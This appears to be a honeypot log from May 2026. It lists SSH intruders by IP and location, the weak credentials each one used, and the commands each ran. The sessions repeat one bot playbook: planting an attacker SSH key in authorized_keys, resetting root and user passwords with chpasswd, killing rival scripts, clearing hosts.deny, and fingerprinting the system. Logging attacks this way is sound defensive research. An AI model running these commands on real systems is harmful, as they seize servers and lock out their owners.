$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:mFBIdR3iyuQN"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 stein_sol_2 (94.26.106.229) β€” Kriftel, Germany Β· 2 sessions Β· 2 cmds
2026-05-17 19:53 EDT Β· as root/1qaz!QAZ, root/36363636
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -v -n -r -m Γ—2
🎭 yankee_root_44 (43.153.37.39) β€” Santa Clara, United States Β· 2 sessions Β· 40 cmds
2026-05-17 19:04 EDT Β· as kian/kian, rahul/rahul
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "rahul\n0WoieRsDAHis\n0WoieRsDAHis"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "rahul\n0WoieRsDAHis\n0WoieRsDAHis\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "kian\nrvae84L33K1h\nrvae84L33K1h"|passwd|bash
$ echo "kian\nrvae84L33K1h\nrvae84L33K1h\n"|passwd
🎭 autobahn_root_17 (2.27.36.16) β€” Frankfurt am Main, Germany Β· 2 sessions Β· 40 cmds
2026-05-17 19:03 EDT Β· as kian/kian, rahul/rahul
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "kian\nT7e1TNU0PyG3\nT7e1TNU0PyG3"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "kian\nT7e1TNU0PyG3\nT7e1TNU0PyG3\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "rahul\nNgItAgPEZ6J0\nNgItAgPEZ6J0"|passwd|bash
$ echo "rahul\nNgItAgPEZ6J0\nNgItAgPEZ6J0\n"|passwd
🎭 ghost_root_110 (156.232.13.218) β€” Hong Kong, Hong Kong Β· 1 session Β· 19 cmds
2026-05-17 19:07 EDT Β· as root/Abcd!234
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:FD0gPHwrEVNQ"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 autobahn_root_18 (167.86.95.8) β€” Nuremberg, Germany Β· 2 sessions Β· 38 cmds
2026-05-17 18:16 EDT Β· as root/Qwert123456, root/smooth
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:0ZQHMzg5TQCt"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:fsD0FTgH8Xfy"|chpasswd|bash
🎭 lotus_root_3 (106.51.92.114) β€” Bengaluru, India Β· 1 session Β· 19 cmds
2026-05-17 18:16 EDT Β· as root/harley1
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:IH7sAT5rX3df"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 wraith_root_84 (129.212.236.215) β€” Singapore, Singapore Β· 2 sessions Β· 39 cmds
2026-05-17 17:39 EDT Β· as alice/alice123, root/m123456789
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "alice123\n3LHFbaybKtYL\n3LHFbaybKtYL"|passwd|bash
$ Enter new UNIX password:
$ echo "alice123\n3LHFbaybKtYL\n3LHFbaybKtYL\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:Ei0ZEdoffWyr"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 kimchi_root_15 (211.254.212.59) β€” Seongnam-si, South Korea Β· 2 sessions Β· 39 cmds
2026-05-17 17:41 EDT Β· as alice/alice123, root/m123456789
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:UY9EKI3PphFx"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "alice123\nRpcLpg5ltc0N\nRpcLpg5ltc0N"|passwd|bash
$ Enter new UNIX password:
$ echo "alice123\nRpcLpg5ltc0N\nRpcLpg5ltc0N\n"|passwd
🎭 burger_root_54 (198.98.62.211) β€” New York, United States Β· 2 sessions Β· 38 cmds
2026-05-17 17:41 EDT Β· as root/3edcVFR$, root/P@ssword1234
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:dWlgpbz7IiVn"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:G6XTowZOffou"|chpasswd|bash
🎭 monsoon_root_19 (122.252.246.1) β€” Patna, India Β· 2 sessions Β· 38 cmds
2026-05-17 17:38 EDT Β· as root/3edcVFR$, root/P@ssword1234
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:E9DUqrrhYEkZ"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:BMyGS4SAb4ZF"|chpasswd|bash
🎭 wraith_root_85 (43.134.184.253) β€” Singapore, Singapore Β· 1 session Β· 19 cmds
2026-05-17 17:42 EDT Β· as root/m123456789
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:EGBeSS7YBhmr"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 ghost_root_111 (213.35.128.24) β€” Tallinn, Estonia Β· 1 session Β· 19 cmds
2026-05-17 17:38 EDT Β· as root/P@ssword1234
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:MHcgHbeq4GNY"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cipher_root_85 (43.134.13.67) β€” Singapore, Singapore Β· 2 sessions Β· 38 cmds
2026-05-17 16:28 EDT Β· as root/hehe, root/qwe123qwe123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:qzW7VP6ytn9z"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:UkxMC7ON1VbP"|chpasswd|bash
🎭 wraith_root_86 (43.163.86.65) β€” Singapore, Singapore Β· 2 sessions Β· 38 cmds
2026-05-17 16:25 EDT Β· as root/hehe, root/qwe123qwe123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
